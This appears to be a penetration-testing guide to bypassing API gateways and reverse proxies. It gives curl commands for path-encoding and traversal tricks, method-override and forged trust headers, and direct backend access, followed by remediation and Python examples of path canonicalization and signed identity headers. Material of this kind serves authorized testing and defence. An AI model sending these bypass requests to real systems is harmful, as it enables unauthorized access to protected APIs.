Exploitation A05 A01

API Gateway Bypass

API gateways and reverse proxies (Nginx, Kong, Envoy, AWS API Gateway) enforce authentication, rate limiting, and routing. Misconfigurations in path normalization, header handling, and routing rules allow attackers to bypass these controls and access unprotected backend APIs directly.

Path Traversal & Normalization

```bash
# API gateway blocks /admin/* but can be bypassed with path confusion:

# Double encoding:
curl -s https://target.com/api/..%252f..%252fadmin/users

# Path normalization differences:
curl -s https://target.com/api/./admin/users
curl -s https://target.com/api/admin/../admin/users
curl -s https://target.com/api/%2e%2e/admin/users
curl -s https://target.com/api/..;/admin/users       # Tomcat/Spring
curl -s https://target.com/api/admin/users;.json      # Semicolon injection

# Trailing characters:
curl -s https://target.com/admin/users/
curl -s https://target.com/admin/users%20
curl -s https://target.com/admin/users%00
curl -s https://target.com/admin/users..json

# Case sensitivity (gateway case-sensitive, backend isn't):
curl -s https://target.com/Admin/users
curl -s https://target.com/ADMIN/users
curl -s https://target.com/aDmIn/users

# HTTP method override:
curl -s -X GET https://target.com/api/admin/users \
  -H 'X-HTTP-Method-Override: DELETE'
curl -s -X POST https://target.com/api/admin/users \
  -H 'X-HTTP-Method: PUT'
```

Direct Backend Access

```bash
# Discover backend servers bypassing the gateway:

# Check for internal headers revealing backend info:
curl -sI https://target.com/api/users | grep -iE 'x-backend|x-served|x-upstream|via|x-real'

# Try accessing backend ports directly:
# If you discover internal IPs from headers or SSRF:
curl -s http://10.0.1.50:8080/api/users  # No auth required!

# Exploit API version routing gaps:
# Gateway protects /api/v2/* but not /api/v1/*:
curl -s https://target.com/api/v1/admin/users -H 'Authorization: Bearer REGULAR_TOKEN'

# Test unregistered paths:
# Gateway only routes known paths — try undocumented ones:
curl -s https://target.com/api/internal/config
curl -s https://target.com/api/debug
curl -s https://target.com/api/health
curl -s https://target.com/api/metrics
curl -s https://target.com/api/graphql  # GraphQL may bypass REST gateway rules
```
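The two blocks above work because the gateway matches routing rules against the raw request path while the backend resolves a different one. The defence is to canonicalize before matching and to refuse anything outside the route table. As an added example (written for this page in Python; it is not the page's own code nor any gateway vendor's), the function below decodes percent-encoding until it is stable (bounded, so `%252f` and deeper nesting are handled), rejects control characters such as `%00`, drops `;` path parameters from every segment, trims whitespace, resolves `.` and `..`, collapses empty segments and trailing slashes, and lower-cases the result. With that in place every variant from the Path Traversal block lands on the same canonical route, and the version-gap and undocumented-path tricks from the Direct Backend Access block hit a default-deny: the route prefixes are constructed for the example, and any canonical path not listed is reported as `unrouted` and never forwarded.

```python
from urllib.parse import unquote

# Route table for this example (constructed, not any real gateway's config).
# Prefixes are matched against the CANONICAL path, and every path the
# gateway does not know is refused rather than forwarded, so an old /api/v1
# tree or an undocumented /api/debug never reaches the backend by default.
PROTECTED_PREFIXES = ("/admin", "/api/admin", "/api/v1/admin", "/api/v2/admin")
PUBLIC_PREFIXES = ("/api/users", "/api/v1/users", "/api/v2/users", "/api/health")
MAX_DECODE_ROUNDS = 3  # enough for double encoding; anything deeper is rejected


def canonicalize_path(raw_path):
    """Return the canonical request path, or None if the request must be rejected."""
    path = raw_path.split("?", 1)[0]          # the query string is never part of routing
    for _ in range(MAX_DECODE_ROUNDS):        # 1. percent-decode until stable
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None                           # still changing after the bound: hostile
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in path):
        return None                           # 2. %00 and other control characters
    kept = []
    for segment in path.split("/"):
        segment = segment.split(";", 1)[0].strip()   # 3./4. drop ';params', trim %20
        if segment in ("", "."):              # 5. collapse '//', './' and trailing '/'
            continue
        if segment == "..":                   #    resolve '..' (never above the root)
            if kept:
                kept.pop()
            continue
        kept.append(segment)
    return "/" + "/".join(kept).lower()       # 6. case-fold so /Admin cannot slip past


def _under(path, prefix):
    """True if path is the prefix itself or lies below it."""
    return path == prefix or path.startswith(prefix + "/")


def route_decision(raw_path):
    """'reject', 'protected', 'public' or 'unrouted' for a raw request path."""
    canon = canonicalize_path(raw_path)
    if canon is None:
        return "reject"
    if any(_under(canon, p) for p in PROTECTED_PREFIXES):
        return "protected"
    if any(_under(canon, p) for p in PUBLIC_PREFIXES):
        return "public"
    return "unrouted"


if __name__ == "__main__":
    # Constructed input: the bypass paths from this page plus a few routine requests.
    samples = [
        "/api/..%252f..%252fadmin/users", "/api/./admin/users",
        "/api/admin/../admin/users", "/api/%2e%2e/admin/users",
        "/api/..;/admin/users", "/api/admin/users;.json",
        "/admin/users/", "/admin/users%20", "/admin/users%00",
        "/admin/users..json", "/aDmIn/users", "/api/v1/admin/users",
        "/api/users", "/api/debug", "/api/graphql", "/api/%25252fadmin",
    ]
    for raw in samples:
        print(f"{raw:34} -> {str(canonicalize_path(raw)):22} {route_decision(raw)}")
```

Matching on the canonical form is what makes the `;`, `..`, encoding and case variants converge; the default-deny branch is what closes the `/api/v1` and `/api/debug` gaps, because a route the gateway was never told about is not a route at all. Method-override headers are a separate problem: the gateway should honour `X-HTTP-Method-Override` only for routes where it was explicitly enabled, and authorize on the effective method, not the one on the request line.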

Header Manipulation

```bash
# Bypass authentication at the gateway level:

# Internal trust headers (gateway adds these for backend):
curl -s https://target.com/api/admin/users \
  -H 'X-Forwarded-User: admin'

curl -s https://target.com/api/admin/users \
  -H 'X-User-Id: 1' \
  -H 'X-User-Role: admin'

# If the backend trusts headers added by the gateway:
curl -s https://target.com/api/users \
  -H 'X-Internal-Auth: true'

# Host header routing bypass:
curl -s https://target.com/api/admin/ \
  -H 'Host: internal-admin.target.local'

# Protocol downgrade:
curl -s http://target.com/api/admin/users  # HTTP might skip gateway

# Content-Type confusion:
curl -s https://target.com/api/users \
  -H 'Content-Type: application/xml' \
  -d '<user><role>admin</role></user>'
# Gateway validates JSON but backend also accepts XML
```

Testing Checklist

  1. Identify the gateway/proxy technology from response headers
  2. Test path normalization bypass (encoding, traversal, case, trailing chars)
  3. Test direct backend access via discovered internal IPs
  4. Test internal trust headers (X-Forwarded-User, X-User-Role)
  5. Test old API versions that may bypass new gateway rules
  6. Test HTTP method override headers
  7. Test hostname-based routing bypass via Host header

Evidence Collection

Bypass Request: HTTP request that circumvents the gateway's protection

Comparison: Side-by-side of blocked request vs bypassed request

CVSS Range: Auth bypass: 8.1–9.8 | Rate limit bypass: 5.3–7.5

Remediation

  • Normalize paths: Ensure the gateway normalizes all paths before matching routing rules.
  • Backend auth: Never rely solely on gateway auth — implement authentication at the backend service level too.
  • Strip trust headers: Gateway must strip internal headers (X-User-Id, X-Internal-Auth) from external requests.
  • Network segmentation: Backend services should only accept connections from the gateway, not from the internet.
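The Header Manipulation block and the "strip trust headers" and "backend auth" bullets above describe two halves of one fix: the gateway must drop identity headers that arrive from outside, and the backend must not believe a plain header at all. As an added example (Python written for this page; not the page's own code and not any product's implementation), the gateway below strips the trust headers named on this page (`X-Forwarded-User`, `X-User-Id`, `X-User-Role`, `X-Internal-Auth`, plus anything under an `X-Internal-` prefix) and, after it has authenticated the caller itself, forwards the identity under an HMAC-signed header pair. The `X-Gateway-Identity`/`X-Gateway-Signature` names and the shared secret are constructed for the example. The backend accepts an identity only when the signature verifies, so a request that reaches it directly (gateway bypassed) or with an altered role is treated as anonymous.

```python
import hashlib
import hmac

# Header names that only the gateway may set. The first four are the trust
# headers named on this page; the X-Gateway-* pair is a constructed scheme
# for this example (gateway-signed identity), not a standard header.
GATEWAY_ONLY_HEADERS = {
    "x-forwarded-user", "x-user-id", "x-user-role", "x-internal-auth",
    "x-gateway-identity", "x-gateway-signature",
}
GATEWAY_ONLY_PREFIX = "x-internal-"


def _get(headers, name):
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    wanted = name.lower()
    for key, value in headers.items():
        if key.lower() == wanted:
            return value
    return None


def strip_trust_headers(headers):
    """Gateway ingress: drop every header an external client is not allowed to supply."""
    return {
        name: value
        for name, value in headers.items()
        if name.lower() not in GATEWAY_ONLY_HEADERS
        and not name.lower().startswith(GATEWAY_ONLY_PREFIX)
    }


def gateway_attach_identity(headers, user_id, role, secret):
    """Gateway egress: after authenticating the caller, add an HMAC-signed identity for the backend."""
    identity = f"user={user_id};role={role}"
    signature = hmac.new(secret, identity.encode(), hashlib.sha256).hexdigest()
    forwarded = dict(headers)
    forwarded["X-Gateway-Identity"] = identity
    forwarded["X-Gateway-Signature"] = signature
    return forwarded


def backend_identity(headers, secret):
    """Backend: return (user_id, role) only if the gateway signature verifies, else None (anonymous)."""
    identity = _get(headers, "X-Gateway-Identity")
    signature = _get(headers, "X-Gateway-Signature")
    if identity is None or signature is None:
        return None
    expected = hmac.new(secret, identity.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, signature):   # constant-time comparison
        return None
    fields = dict(part.split("=", 1) for part in identity.split(";") if "=" in part)
    if "user" not in fields or "role" not in fields:
        return None
    return fields["user"], fields["role"]


if __name__ == "__main__":
    secret = b"constructed-shared-secret"  # constructed; deploy a per-environment secret in practice
    # Constructed request: an external caller forging the gateway's trust headers.
    forged = {"Accept": "application/json", "X-User-Id": "1",
              "X-User-Role": "admin", "X-Internal-Auth": "true"}
    # 1. Through the gateway: forged headers are stripped, the real identity is signed.
    via_gateway = gateway_attach_identity(strip_trust_headers(forged), "42", "user", secret)
    print("via gateway:", backend_identity(via_gateway, secret))   # ('42', 'user')
    # 2. Straight to the backend (gateway bypassed): no valid signature, so anonymous.
    print("direct     :", backend_identity(forged, secret))        # None
    # 3. Identity edited after signing: signature no longer matches.
    tampered = dict(via_gateway)
    tampered["X-Gateway-Identity"] = "user=42;role=admin"
    print("tampered   :", backend_identity(tampered, secret))      # None
```

The backend check is what turns the "never rely solely on gateway auth" bullet into code: a direct connection from `10.0.1.50:8080`-style discovery carries no signature and gets no identity, whichever headers it sets. Network segmentation still belongs next to it, since the signed header only proves the gateway saw the request, not that the caller is entitled to the resource; the backend's own authorization runs on the returned role.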

False Positive Identification

  • Direct backend access by design: Some architectures intentionally expose backends alongside the gateway — verify with the client whether direct access is intended.
  • Rate limit reset on gateway restart: Rate limits resetting during deployments may be a known limitation, not a bypass — test during steady state.
  • Different response ≠ bypass: Getting a different error from the gateway vs. backend doesn't mean auth was bypassed — confirm you accessed protected resources.